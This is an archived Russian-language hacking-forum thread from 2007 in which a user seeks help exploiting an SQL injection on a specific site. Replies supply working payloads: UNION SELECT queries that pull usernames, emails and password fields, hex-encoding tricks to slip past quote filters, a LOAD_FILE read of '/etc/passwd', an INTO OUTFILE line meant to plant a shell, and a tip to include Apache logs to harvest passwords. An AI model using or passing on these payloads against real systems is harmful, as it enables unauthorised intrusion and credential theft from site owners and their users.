Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Как быть?(MySQL) (https://forum.antichat.xyz/showthread.php?t=43671)

OneMiay 04.07.2007 03:01

Как быть?(MySQL)
 
Вообщем всем привет, есть пару вопросов очень надеюсь на вашу помощь…
Имеем к примеру SQL-inj на сайте типа:
bagsql.ru/index.php?id=-1+union+select+1,2,3/*
Выводится 2-ечка, есть возможность посмотреть VERSION() USER() и т.д, но фильтруются символы, пробовал CHAR() текст выводится , но вопрос заключается в том что я 100% уверен что там есть таблица users в которой присутствуют usid, email, usname, uspwd дак вот составляя такой вот запрос:
bagsql.ru/index.php?id=-1+union+select+1,usname,3+from+users/*
Получаю ошибку… Мне кажется что это из-за фильтра… хотя хз… Посоветуйте как быть, PlizZZe.
Ещё возник один вопросик, если я не могу выполнить LOAD_FILE() //пробовал даже кодировать через CHAR(), то выполнится ли OUTFILE? И можно ли тоже использовать кодирование?
И на последок малёк ОФФтоп. Есть инкулуд, могу читать passwd, нет прав на shadow, куда ещё можно залезть для поиска хешей? Если не трудно то напишите плиз пути.
//Слышал что можно в логах нарыть пассы, реально ли?
Всем спасибо, кто чем поможет, с меня репа.

Isis 04.07.2007 03:25

Код:

http://www.bagsql.ru/index.php?id=-1+union+select+1,concat_ws(0x3b,usid,email,usname,uspwd)+from+mysql.users+limit+1,1/*
Экранирование кавычек - маленький шанс что зальешь шелл т.к. указать путь будет очень сложно =\

ice1k 04.07.2007 05:49

Isis, concat_ws(0x3b,usid,email,usname, uspwd) и mysql.users O_o :-| ?

n1†R0x 04.07.2007 11:40

2 автор: может ссылку норм дашь? :)
Цитата:

но фильтруются символы
т.е. цифры выводятся, символы - нет
может проблема в кодировке?
bagsql.ru/index.php?id=-1+union+select+1,convert(usname+using+cp1251),3+fr om+users/*]
вместо cp1251 - кодировка.

Серенький 04.07.2007 13:00

либо поуниверсальнее можешь ввести

bagsql.ru/index.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(usname,0x 55),0x55),3+from+users/*

или как nitrox говорит.

Ni0x 04.07.2007 13:04

Цитата:

И на последок малёк ОФФтоп. Есть инкулуд, могу читать passwd, нет прав на shadow, куда ещё можно залезть для поиска хешей? Если не трудно то напишите плиз пути.
попробуй проинклудить логи апача, предварительно нужно послать запрос на сервер, тема уже поднималась

Constantine 04.07.2007 13:12

Ссылку в студию. Sql иньекция- такая вещь, с которй надо работать на месте, разбиратся с конкретным случаем

blackybr 04.07.2007 18:55

Isis насчет кавчек бред =))

если есть файл прив, то нас спасает кодирование в base64

то есть у нас есть LOAD_FILE('/etc/passwd'), кодируем /etc/passwd И получаем 2f 65 74 63 2f 70 61 73 73 77 64, то бишь LOAD_FILE(0x2f6574632f706173737764)

также поступаем во всех местах где юзаются кавычки.. например запрос ..
./index.php?id=-31337+union+select+username,2,3,4,5+from+users+whe re+group='admin'/*

опять же admin = 61 64 6d 69 6e

./index.php?id=-31337+union+select+username,2,3,4,5+from+users+whe re+group=0x61646d696e/*

и тд..

Isis 04.07.2007 19:16

Цитата:

Сообщение от blackybr
Isis насчет кавчек бред =))

если есть файл прив, то нас спасает кодирование в base64

то есть у нас есть LOAD_FILE('/etc/passwd'), кодируем /etc/passwd И получаем 2f 65 74 63 2f 70 61 73 73 77 64, то бишь LOAD_FILE(0x2f6574632f706173737764)

также поступаем во всех местах где юзаются кавычки.. например запрос ..
./index.php?id=-31337+union+select+username,2,3,4,5+from+users+whe re+group='admin'/*

опять же admin = 61 64 6d 69 6e

./index.php?id=-31337+union+select+username,2,3,4,5+from+users+whe re+group=0x61646d696e/*

и тд..

br, как ты укажешь путь в base64?
Например
Код:

select+1,2+from+mysql.users+into+outfile+'/home/usr1/www/'/*
Как ты здесь путь в base64 декодируешь??Нифига не получиться =)

gemaglabin 04.07.2007 19:25

Какой еще бэйсшиссятчитыре , это хекс :)


Время: 02:02